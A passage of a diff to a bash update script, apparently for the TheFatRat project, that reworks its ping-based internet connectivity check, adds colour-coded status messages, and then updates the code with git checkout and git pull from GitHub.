- echo -e $red You need to be connected to internet to be able to update fatrat;
- sleep 1
- exit 1
-
-else
- echo -e $green [✔]::[Internet Connection]: connected!;
+ echo -e $red "[X] Your linux OS is not able to resolve"
+ echo -e $red "hostnames over terminal using ping !!"
 echo ""
+ echo -e $yellow "Search on the web : (unable to resolve hostnames ping) to find a solution"
+echo ""
+echo -e $green "Update will continue , but is not garantee that cloud work properly."
+echo ""
+echo -e $cyan "Update will continue because :"
+echo -e $green "Ping google.com =$red Failed"
+echo -e $green "Ping google DNS = Success"
+echo ""
+echo -e $green "Press [ENTER] key to continue"
+read continue
 sleep 1
+elif [ $png == "1" ]
+then
+ echo -e $yellow "You are connected to your local network but not to the web ."
+ echo -e $yellow "Check if your router/modem gateway is connected to the web ."
+echo ""
+echo -e $green "Update will not continue , you are only connected to your local lan."
+echo ""
+echo -e $cyan "Update will stop because :"
+echo -e $green "Ping google.com =$red Failed"
+echo -e $green "Ping google DNS =$red Failed"
+echo ""
+echo -e $green "Press [ENTER] key to continue"
+read continue
+exit 1
+sleep 1
+elif [ $png == "2" ]
+then
+echo -e $red "You are not connected to any network ."
+echo ""
+echo -e $cyan "Update will stop because :"
+echo -e $green "Ping google.com =$red Failed"
+echo -e $green "Ping google DNS =$red Failed"
+echo ""
+echo -e $green "Press [ENTER] key to continue"
+read continue
+exit 1
+ sleep 1
+fi
+}
+ping -c 1 google.com > /dev/null 2>&1
+png="$?"
+ if [ $png != 0 ]
+then
+chknet
+fi
+sleep 1
 echo -e $cyan "************************************"
 echo -e $cyan "** $green Updating Fatrat from Github $cyan **"
 echo -e $cyan "************************************"
 sleep 3
+git checkout master
 git pull origin master
 echo -e $cyan "*************************"